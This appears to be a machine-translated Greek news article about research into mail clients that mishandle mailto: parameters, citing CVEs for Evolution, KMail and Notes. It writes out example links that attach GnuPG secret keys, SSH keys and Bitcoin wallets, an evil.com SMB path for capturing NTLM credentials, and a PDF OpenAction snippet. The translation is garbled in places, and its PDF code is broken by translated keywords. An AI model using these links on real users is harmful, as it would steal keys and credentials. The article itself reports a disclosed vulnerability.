Ερευνητές από το Πανεπιστήμιο του Ρουρ του Μπόχουμ (Γερμανία) () συμπεριφορά των πελατών αλληλογραφίας κατά την επεξεργασία συνδέσμων "mailto:" με προηγμένες παραμέτρους. Πέντε από τους είκοσι πελάτες email που εξετάστηκαν ήταν ευάλωτοι σε μια επίθεση που χειραγωγούσε την αντικατάσταση πόρων χρησιμοποιώντας την παράμετρο "attach". Επιπλέον έξι προγράμματα-πελάτες ηλεκτρονικού ταχυδρομείου ήταν ευάλωτα σε επίθεση αντικατάστασης κλειδιού PGP και S/MIME και τρεις πελάτες ήταν ευάλωτοι σε επίθεση για την εξαγωγή του περιεχομένου των κρυπτογραφημένων μηνυμάτων.
Συνδέσεις ""χρησιμοποιούνται για την αυτοματοποίηση του ανοίγματος ενός προγράμματος-πελάτη ηλεκτρονικού ταχυδρομείου προκειμένου να γραφτεί μια επιστολή στον παραλήπτη που καθορίζεται στον σύνδεσμο. Εκτός από τη διεύθυνση, μπορείτε να καθορίσετε πρόσθετες παραμέτρους ως μέρος του συνδέσμου, όπως το θέμα της επιστολής και ένα πρότυπο για τυπικό περιεχόμενο. Η προτεινόμενη επίθεση χειρίζεται την παράμετρο "attach", η οποία σας επιτρέπει να επισυνάψετε ένα συνημμένο στο μήνυμα που δημιουργείται.
Τα προγράμματα-πελάτες αλληλογραφίας Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) και Pegasus Mail ήταν ευάλωτα σε μια ασήμαντη επίθεση που σας επιτρέπει να επισυνάπτετε αυτόματα οποιοδήποτε τοπικό αρχείο, που καθορίζεται μέσω ενός συνδέσμου όπως "mailto:?attach=path_to_file". Το αρχείο επισυνάπτεται χωρίς να εμφανίζεται προειδοποίηση, επομένως χωρίς ιδιαίτερη προσοχή, ο χρήστης μπορεί να μην παρατηρήσει ότι η επιστολή θα σταλεί με συνημμένο.
Για παράδειγμα, χρησιμοποιώντας έναν σύνδεσμο όπως "mailto:[προστασία μέσω email]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" μπορείτε να εισαγάγετε ιδιωτικά κλειδιά από το GnuPG στο γράμμα. Μπορείτε επίσης να στείλετε τα περιεχόμενα των πορτοφολιών κρυπτογράφησης (~/.bitcoin/wallet.dat), των κλειδιών SSH (~/.ssh/id_rsa) και τυχόν αρχείων στα οποία έχει πρόσβαση ο χρήστης. Επιπλέον, το Thunderbird σάς επιτρέπει να επισυνάψετε ομάδες αρχείων με μάσκα χρησιμοποιώντας δομές όπως "attach=/tmp/*.txt".
Εκτός από τα τοπικά αρχεία, ορισμένα προγράμματα-πελάτες ηλεκτρονικού ταχυδρομείου επεξεργάζονται συνδέσμους προς αποθήκευση δικτύου και διαδρομές στον διακομιστή IMAP. Συγκεκριμένα, το IBM Notes σάς επιτρέπει να μεταφέρετε ένα αρχείο από έναν κατάλογο δικτύου κατά την επεξεργασία συνδέσμων όπως "attach=\\evil.com\dummyfile", καθώς και να παρεμποδίζετε παραμέτρους ελέγχου ταυτότητας NTLM στέλνοντας έναν σύνδεσμο σε διακομιστή SMB που ελέγχεται από τον εισβολέα (το αίτημα θα σταλεί με τον τρέχοντα χρήστη παραμέτρων ελέγχου ταυτότητας).
Το Thunderbird επεξεργάζεται με επιτυχία αιτήματα όπως "attach=imap:///fetch>UID>/INBOX>1/", τα οποία σας επιτρέπουν να επισυνάψετε περιεχόμενο από φακέλους στον διακομιστή IMAP. Ταυτόχρονα, τα μηνύματα που ανακτώνται από το IMAP, κρυπτογραφημένα μέσω OpenPGP και S/MIME, αποκρυπτογραφούνται αυτόματα από το πρόγραμμα-πελάτη αλληλογραφίας πριν από την αποστολή. Οι προγραμματιστές του Thunderbird ήταν για το πρόβλημα τον Φεβρουάριο και στο τεύχος το πρόβλημα έχει ήδη διορθωθεί (οι κλάδοι Thunderbird 52, 60 και 68 παραμένουν ευάλωτοι).
Οι παλιές εκδόσεις του Thunderbird ήταν επίσης ευάλωτες σε δύο άλλες παραλλαγές επίθεσης στο PGP και στο S/MIME που πρότειναν οι ερευνητές. Ειδικότερα, το Thunderbird, καθώς και το OutLook, το PostBox, το eM Client, το MailMate και το R2Mail2, υποβλήθηκαν σε επίθεση αντικατάστασης κλειδιού, που προκλήθηκε από το γεγονός ότι ο πελάτης αλληλογραφίας εισάγει και εγκαθιστά αυτόματα νέα πιστοποιητικά που μεταδίδονται σε μηνύματα S/MIME, κάτι που επιτρέπει ο εισβολέας να οργανώσει την αντικατάσταση των δημόσιων κλειδιών που είναι ήδη αποθηκευμένα από τον χρήστη.
Η δεύτερη επίθεση, στην οποία είναι ευαίσθητα τα Thunderbird, PostBox και MailMate, χειρίζεται τα χαρακτηριστικά του μηχανισμού αυτόματης αποθήκευσης πρόχειρων μηνυμάτων και επιτρέπει, χρησιμοποιώντας παραμέτρους mailto, να ξεκινήσει την αποκρυπτογράφηση κρυπτογραφημένων μηνυμάτων ή την προσθήκη ψηφιακής υπογραφής για αυθαίρετα μηνύματα, με επακόλουθη μετάδοση του αποτελέσματος στον διακομιστή IMAP του εισβολέα. Σε αυτήν την επίθεση, το κρυπτογραφημένο κείμενο μεταδίδεται μέσω της παραμέτρου "body" και η ετικέτα "meta refresh" χρησιμοποιείται για την έναρξη μιας κλήσης στον διακομιστή IMAP του εισβολέα. Για παράδειγμα: ' '
Για την αυτόματη επεξεργασία συνδέσμων "mailto:" χωρίς αλληλεπίδραση χρήστη, μπορούν να χρησιμοποιηθούν ειδικά σχεδιασμένα έγγραφα PDF - η ενέργεια OpenAction σε PDF σάς επιτρέπει να εκκινείτε αυτόματα το πρόγραμμα χειρισμού mailto κατά το άνοιγμα ενός εγγράφου:
%PDF-1.5
1 0 αντικ
<< /Τύπος /Κατάλογος /OpenAction [2 0 R] >>
endobj
2 0 αντικ
<< /Τύπος /Ενέργεια /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
Πηγή: opennet.ru